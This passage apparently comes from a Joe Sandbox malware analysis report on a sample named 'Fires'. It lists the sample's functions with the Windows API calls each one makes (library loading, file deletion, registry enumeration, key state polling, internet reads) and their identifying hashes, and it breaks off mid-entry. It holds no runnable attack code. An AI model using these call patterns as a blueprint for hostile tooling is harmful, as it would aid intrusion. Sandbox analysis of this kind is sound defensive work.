Instruction ID: c627cb794b566ca824b1a6ca2fef1f43fe52af21d0ce67593a25796e633b6af6
Opcode Fuzzy Hash: f77f050576dab739e2abff0b19ac466f932a9baa31b410c1b775f604ed160301
Instruction Fuzzy Hash: 93E08635602722179A211B25BC08A5A7629DF83B12B0A0156FD01E2340DB60CC0180B5

Function 00D46607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D85657,?,?,00D462FA,?,00000001,?,?,00000000), ref: 00D46610
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D46622
FreeLibrary.KERNEL32(00000000,?,?,00D85657,?,?,00D462FA,?,00000001,?,?,00000000), ref: 00D46635

Strings

Wow64RevertWow64FsRedirection, xrefs: 00D4661C
kernel32.dll, xrefs: 00D46609

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 4b7c636c017194b9e5dbc3afe94621544ab2277c140ec315397428f4b4ef8584
Instruction ID: ff01462492097818bb2250a6a6c239861e272b9c8d2c9a18d6447557fa5a6c15
Opcode Fuzzy Hash: 4b7c636c017194b9e5dbc3afe94621544ab2277c140ec315397428f4b4ef8584
Instruction Fuzzy Hash: C9D01235613732574A322F256C1898E7B1ADF96F1130A0056B901E2254CF60CD4185B9

Function 00DB3306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DB35C4
DeleteFileW.KERNEL32(?), ref: 00DB3646
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DB365C
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DB366D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DB367F

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: bcdb141731c99508cf127423be3bebf0e078d7f162cd6911df56cdaae4744cb3
Instruction ID: b47121f890ccde38c29aa08fa2639f35e9349fc047ec1526b214efe9f5e389e2
Opcode Fuzzy Hash: bcdb141731c99508cf127423be3bebf0e078d7f162cd6911df56cdaae4744cb3
Instruction Fuzzy Hash: BDB13B72E01219ABDF15DBA4CC85EDEBBBDEF49310F0040A6F50AE6241EA34DB449B71

Function 00DCADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00DCAE87
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DCAE95
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DCAEC8
CloseHandle.KERNEL32(?), ref: 00DCB09D

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 767ab0a2f677aa2464af0a1a14ccca4ae6b86b609c916f337538e468c9fe6aae
Instruction ID: edaa3f069f7ca870f1d48f961cd74f55d085a0d7f75bb647f87eacdcf9c0934b
Opcode Fuzzy Hash: 767ab0a2f677aa2464af0a1a14ccca4ae6b86b609c916f337538e468c9fe6aae
Instruction Fuzzy Hash: C7A19271A04301AFE720DF28C886F2AB7E5EF44724F14885DF9999B392D771EC458BA1

Function 00DCC429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4B329: _wcslen.LIBCMT ref: 00D4B333

Part of subcall function 00DCD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DCC10E,?,?), ref: 00DCD415
Part of subcall function 00DCD3F8: _wcslen.LIBCMT ref: 00DCD451
Part of subcall function 00DCD3F8: _wcslen.LIBCMT ref: 00DCD4C8
Part of subcall function 00DCD3F8: _wcslen.LIBCMT ref: 00DCD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DCC505
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DCC560
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DCC5C3
RegCloseKey.ADVAPI32(?,?), ref: 00DCC606
RegCloseKey.ADVAPI32(00000000), ref: 00DCC613

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: eab982a6f0063486f1287f773188d160d8eb3b38fdd2d296702f65ce8691d38e
Instruction ID: c218411ec113aeed21aa65023eec0aa1781fa97cd073b0c2602babe59c9fe352
Opcode Fuzzy Hash: eab982a6f0063486f1287f773188d160d8eb3b38fdd2d296702f65ce8691d38e
Instruction Fuzzy Hash: CD61A331118242AFC714DF14C890F2ABBE5FF84308F54959DF59A8B2A2CB31ED46CBA1

Function 00DAED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00DAE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DAD7CD,?), ref: 00DAE714

Part of subcall function 00DAE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DAD7CD,?), ref: 00DAE72D

Part of subcall function 00DAEAB0: GetFileAttributesW.KERNEL32(?,00DAD840), ref: 00DAEAB1

lstrcmpiW.KERNEL32(?,?), ref: 00DAED8A
MoveFileW.KERNEL32(?,?), ref: 00DAEDC3
_wcslen.LIBCMT ref: 00DAEF02
_wcslen.LIBCMT ref: 00DAEF1A
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00DAEF67

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: fdeeb821964a2ba682d640314e4ad143535eb0c0f406ff6c6b43eb9e78ce2c47
Instruction ID: c235d18f4b0edc33bda1fc5acc917652b31cb494387b169a6156b3f25f100bc2
Opcode Fuzzy Hash: fdeeb821964a2ba682d640314e4ad143535eb0c0f406ff6c6b43eb9e78ce2c47
Instruction Fuzzy Hash: C3513BB25083859BC724EB94D8959DBB3ECEF95310F44092EF289D3151EF31A688CB76

Function 00DA9517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00DA9534
VariantClear.OLEAUT32 ref: 00DA95A5
VariantClear.OLEAUT32 ref: 00DA9604
VariantClear.OLEAUT32(?), ref: 00DA9677
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00DA96A2

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 6724ec8aa6e75f808f84c490de517e57e869a3cbbd5629a1038fd321aac24254
Instruction ID: cf04bc1a2054bc19f27c06eb0aed8178bdfc8d8898dbbdb6407cd2a66898bc7c
Opcode Fuzzy Hash: 6724ec8aa6e75f808f84c490de517e57e869a3cbbd5629a1038fd321aac24254
Instruction Fuzzy Hash: C75137B5A00619AFCB14CF68C894AAAB7F9FF89314B158559F909DB310E734E911CBA0

Function 00DB9540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00DB95F3
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00DB961F
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00DB9677
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00DB969C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00DB96A4

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: ac6d5ed0ebe4a3213bfcbf9e31e9727ed65f2bb5fce94a6ad30b7fb16f8481ba
Instruction ID: b3396469040be7f7f23f365fe093183aaaa465035875d7f58bee9505d88a1d03
Opcode Fuzzy Hash: ac6d5ed0ebe4a3213bfcbf9e31e9727ed65f2bb5fce94a6ad30b7fb16f8481ba
Instruction Fuzzy Hash: 29511A35A00215AFCB05DF55C891AAEBBF5FF49314F088059E94AAB362CB35ED41CFA0

Function 00DC9941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00DC999D
GetProcAddress.KERNEL32(00000000,?), ref: 00DC9A2D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00DC9A49
GetProcAddress.KERNEL32(00000000,?), ref: 00DC9A8F
FreeLibrary.KERNEL32(00000000), ref: 00DC9AAF

Part of subcall function 00D5F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00DB1A02,?,753CE610), ref: 00D5F9F1
Part of subcall function 00D5F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00DA0354,00000000,00000000,?,?,00DB1A02,?,753CE610,?,00DA0354), ref: 00D5FA18

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 313d7c86af2f5123e815c9b1be97db0888e1536b8e5dec627776063c319920e6
Instruction ID: 4dbfdb1ead5b5b894e202fe3332761710a7a422025db8c34364f8f40ae754b2a
Opcode Fuzzy Hash: 313d7c86af2f5123e815c9b1be97db0888e1536b8e5dec627776063c319920e6
Instruction Fuzzy Hash: CE512935601206DFCB11DF68C494D99FBB1FF09314B1890A9E8469B762DB31ED86CFA1

Function 00DD75AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00DD766B
SetWindowLongW.USER32(?,000000EC,?), ref: 00DD7682
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00DD76AB
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00DBB5BE,00000000,00000000), ref: 00DD76D0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00DD76FF

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: ad3b4cfb9987b9808fa240f116ba3125c8b726d35ade89371dd88ff520a695dd
Instruction ID: 33e901f505bbe7051092a9839a99a1be8638a22bc5fe9be6817bfbef2621b40c
Opcode Fuzzy Hash: ad3b4cfb9987b9808fa240f116ba3125c8b726d35ade89371dd88ff520a695dd
Instruction Fuzzy Hash: F641C235A08604AFDB658F2CCC48FA97B65EB45350F190296F955A73E0F670ED10D660

Function 00D723C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00D72433
_free.LIBCMT ref: 00D72453

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 85cb00da3ea2d4ac1f965b691349aacb837ae6fefb000634fd6e1c1bef150b32
Instruction ID: 0712e864ef23bb9cff1fbab211e38700dbcfb9ad2a7c7ed37cf191d60498ec85
Opcode Fuzzy Hash: 85cb00da3ea2d4ac1f965b691349aacb837ae6fefb000634fd6e1c1bef150b32
Instruction Fuzzy Hash: 9041C332A002009FDB24DF78C881A6EB7F6EF89714F158569E519EB355E731EE01CBA0

Function 00D419CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00D419E1
ScreenToClient.USER32(00000000,?), ref: 00D419FE
GetAsyncKeyState.USER32(00000001), ref: 00D41A23
GetAsyncKeyState.USER32(00000002), ref: 00D41A3D

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 93efbaf862059f4a72bac528b363a50bffffe4a1ad6e3f102805a33a52372764
Instruction ID: db0203e0469675ad32b1f4adf6fd8209da26c7408b98acb0bbac241d07db9eec
Opcode Fuzzy Hash: 93efbaf862059f4a72bac528b363a50bffffe4a1ad6e3f102805a33a52372764
Instruction Fuzzy Hash: 54418175A0420AFFDF05AF64C848BEEB775FF05724F248316E469A2290C7349A94CBB1

Function 00DA224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00DA2262
PostMessageW.USER32(00000001,00000201,00000001), ref: 00DA230E
Sleep.KERNEL32(00000000,?,?,?), ref: 00DA2316
PostMessageW.USER32(00000001,00000202,00000000), ref: 00DA2327
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00DA232F

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: e62643a42066c1e7d1504471985f772d5ebbb44008ec05873145a5257c3030af
Instruction ID: 44f1e392ddecddde68e58eede14fbf87fafb8e971c3d01838e66994678562abf
Opcode Fuzzy Hash: e62643a42066c1e7d1504471985f772d5ebbb44008ec05873145a5257c3030af
Instruction Fuzzy Hash: 09318B72900219EFDB14CFA8CD89AAE3BB6EB15315F104229F925E72D0C770A944DBA0

Function 00DBD95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00DBCC63,00000000), ref: 00DBD97D
InternetReadFile.WININET(?,00000000,?,?), ref: 00DBD9B4
GetLastError.KERNEL32(?,00000000,?,?,?,00DBCC63,00000000), ref: 00DBD9F9
SetEvent.KERNEL32(?,?,00000000,?,?,?,00DBCC63,00000000), ref: 00DBDA0D
SetEvent.KERNEL32(?,?,00000000,?,?,?,00DBCC63,00000000), ref: 00DBDA37

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 8bf33629740b4078af8e4dd5c8518eb8e78fc74616d6388155616fd91709e497
Instruction ID: 0774f3b6e0c957cf03a9c0c841231d60e61c0c1df0b9c0754666af244edbff61
Opcode Fuzzy Hash: 8bf33629740b4078af8e4dd5c8518eb8e78fc74616d6388155616fd91709e497
Instruction Fuzzy Hash: 79314771A04705EFDF24DFA5D884AABBBFAEB14350B14442EE546D2250EB34EE409B70

Function 00DD61A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00DD61E4
SendMessageW.USER32(?,00001074,?,00000001), ref: 00DD623C
_wcslen.LIBCMT ref: 00DD624E
_wcslen.LIBCMT ref: 00DD6259
SendMessageW.USER32(?,00001002,00000000,?), ref: 00DD62B5

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 700039f0a90166455e40b55b6fc5c3cc531cf8cb49b1d95842bd5505bc8b5eda
Instruction ID: 9cfb2e7fde642860f7a83139452cea6d42ff7c6c6328741900fd526074fcc9e4
Opcode Fuzzy Hash: 700039f0a90166455e40b55b6fc5c3cc531cf8cb49b1d95842bd5505bc8b5eda
Instruction Fuzzy Hash: 75217171900218ABDB119FA4DC84AEE7BB9EF15324F144257FA25EA384D770D985CFB0

Function 00DC138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00DC13AE
GetForegroundWindow.USER32 ref: 00DC13C5
GetDC.USER32(00000000), ref: 00DC1401
GetPixel.GDI32(00000000,?,00000003), ref: 00DC140D
ReleaseDC.USER32(00000000,00000003), ref: 00DC1445

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: f84b3f796595efaf65112251e1b9e9c411f34aaaf10939ceb2b6ba5a3f355de7
Instruction ID: a260d829ae7d2c7dec5ff62e515b86aa1347cf90286af31d06c0e1040ededa85
Opcode Fuzzy Hash: f84b3f796595efaf65112251e1b9e9c411f34aaaf10939ceb2b6ba5a3f355de7
Instruction Fuzzy Hash: 06215136601214EFDB14EF65C894EAEBBF9EF49341B048469E85AD7761CA30ED04DBB0

Function 00D7D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00D7D146
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D7D169

Part of subcall function 00D73B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D66A79,?,0000015D,?,?,?,?,00D685B0,000000FF,00000000,?,?), ref: 00D73BC5

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D7D18F
_free.LIBCMT ref: 00D7D1A2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D7D1B1

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: e0f0be9fe1e41f16e16d07eb5696026667918b21a92b8a8a25b97ecd2e6532f7
Instruction ID: c2490b523a9684bb5e3ce4cc76718a42fff6501789809e0b0b0c027ddaa669c8
Opcode Fuzzy Hash: e0f0be9fe1e41f16e16d07eb5696026667918b21a92b8a8a25b97ecd2e6532f7
Instruction Fuzzy Hash: B8017C766027157F27216ABA9C88D7B7A7FDFC2BA1359812ABD08C6244FA708D0191B0

Function 00DA6078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

